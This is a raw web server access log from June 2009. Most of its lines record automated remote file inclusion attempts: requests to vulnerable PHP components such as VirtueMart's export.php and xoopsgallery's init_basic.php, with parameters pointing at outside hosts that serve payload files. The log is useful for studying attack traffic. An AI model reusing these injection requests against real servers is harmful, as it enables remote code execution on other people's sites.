211.189.40.249 - - [20/Jun/2009:04:55:00 -0400] "GET /logs/access_log.Q109061200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:04:55:02 -0400] "GET /logs/access_log.Q109051000/index1.php?cmd=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:04:55:02 -0400] "GET /index1.php?cmd=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:04:55:03 -0400] "GET /logs/index1.php?cmd=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
66.11.230.36 - - [20/Jun/2009:04:55:37 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:55:37 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:55:38 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:55:46 -0400] "GET /logs/access_log.Q109052400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:48 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:48 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:48 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:50 -0400] "GET /logs/access_log.Q109051600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:51 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:51 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:51 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:55:56 -0400] "GET /logs/access_log.Q109051600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:04:56:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.46.177.182 - - [20/Jun/2009:04:56:28 -0400] "GET /logs/access_log.Q109051500%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:56:30 -0400] "GET /logs/access_log.Q109051500%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:56:31 -0400] "GET /logs/access_log.Q109051600%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:04:56:32 -0400] "GET /logs/access_log.Q109051600%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
82.194.87.219 - - [20/Jun/2009:04:57:17 -0400] "GET /logs///index.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
211.189.40.249 - - [20/Jun/2009:04:57:17 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:57:19 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:57:19 -0400] "GET /logs/access_log.Q109050800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:04:57:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8BF2C2004B0F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.29.190 - - [20/Jun/2009:04:57:43 -0400] "GET /logs/access_log.Q109031800%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:57:44 -0400] "GET /logs/access_log.Q109060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:57:44 -0400] "GET /logs/access_log.Q109053100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.147.29.190 - - [20/Jun/2009:04:57:46 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:57:56 -0400] "GET /logs/access_log.Q109061200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.17.151 - - [20/Jun/2009:04:58:16 -0400] "GET /logs/error_log.Q109042000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.11.230.36 - - [20/Jun/2009:04:58:34 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:04:58:41 -0400] "GET /logs/access_log.Q109052300/index1.php?cmd=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.11.230.36 - - [20/Jun/2009:04:59:09 -0400] "GET /logs/access_log.Q109051000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:04:59:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B824F82E2D200F86F04V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [20/Jun/2009:05:01:40 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [20/Jun/2009:05:01:40 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.249.36.194 - - [20/Jun/2009:05:01:40 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.249.36.194 - - [20/Jun/2009:05:01:49 -0400] "GET /logs/access_log.Q109051600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:02:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8B827200440F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.239.227.229 - - [20/Jun/2009:05:03:05 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [20/Jun/2009:05:03:07 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/Jun/2009:05:03:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [20/Jun/2009:05:03:43 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:03:43 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:03:44 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:04:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479C228600541F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.49.175.157 - - [20/Jun/2009:05:04:15 -0400] "GET //modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:04:15 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:04:15 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:04:29 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
110.45.144.107 - - [20/Jun/2009:05:04:37 -0400] "GET /logs/access_log.Q109060400/popup.php?path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.144.107 - - [20/Jun/2009:05:04:38 -0400] "GET /popup.php?path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
110.45.144.107 - - [20/Jun/2009:05:04:38 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
110.45.144.107 - - [20/Jun/2009:05:04:38 -0400] "GET /logs/popup.php?path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
110.45.144.107 - - [20/Jun/2009:05:04:38 -0400] "GET /errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.144.107 - - [20/Jun/2009:05:04:39 -0400] "GET /logs/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
200.49.175.157 - - [20/Jun/2009:05:05:04 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:05:05:35 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:05:05:36 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:05:52 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:05:52 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:05:52 -0400] "GET /logs/error_log.Q109051900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:05:55 -0400] "GET //modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:06:22 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:06:22 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:06:22 -0400] "GET /logs/access_log.Q109052600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:06:29 -0400] "GET /errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:06:29 -0400] "GET /logs/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:06:29 -0400] "GET /logs/access_log.Q109060300%20%20/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:06:36 -0400] "GET /errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:06:44 -0400] "GET /logs/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:06:44 -0400] "GET /logs/access_log.Q109060300%20%20/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:06:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B814A96325500CEEF072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.49.175.157 - - [20/Jun/2009:05:06:54 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:07:10 -0400] "GET //skin/zero_vote/error.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:07:10 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:07:10 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:07:30 -0400] "GET /logs/access_log.Q109060400///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:08:18 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:08:24 -0400] "GET /logs/error_log.Q109060300%20%20/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:05:08:33 -0400] "GET /logs/access_log.Q109052500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:08:33 -0400] "GET /logs/error_log.Q109060300%20%20/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:05:08:34 -0400] "GET /logs/access_log.Q109052400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:05:08:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.40.249 - - [20/Jun/2009:05:08:58 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:09:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479C92B600591F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.189.40.249 - - [20/Jun/2009:05:09:05 -0400] "GET /logs/access_log.Q109060400///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:09:15 -0400] "GET /logs/access_log.Q109050800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:10:57 -0400] "GET /logs/access_log.Q109061400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:11:04 -0400] "GET /logs/access_log.Q109051900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:11:31 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:11:31 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:11:31 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:11:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B814A96B2A500C3EF072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.149.157.130 - - [20/Jun/2009:05:11:43 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:12:32 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:05:12:50 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:05:13:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [20/Jun/2009:05:14:12 -0400] "GET /images/over-index4_elcomed.jpg HTTP/1.1" 200 2334 "-" "Googlebot-Image/1.0"
87.230.22.39 - - [20/Jun/2009:05:14:39 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:14:52 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:14:52 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:14:52 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:14:56 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:05:15:07 -0400] "GET /logs/access_log.Q109050700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:15:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B814A96D2B500CDEF072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.230.22.39 - - [20/Jun/2009:05:15:31 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_simpleboard/image_upload.php?sbp=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:15:40 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:15:40 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:15:40 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:15:56 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:15:56 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:15:56 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:16:01 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:16:01 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:16:01 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:16:01 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:16:07 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:16:59 -0400] "GET /logs/access_log.Q109061200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:17:14 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:17:14 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:17:14 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:17:14 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:17:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B81488EA2E2003BEF04U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
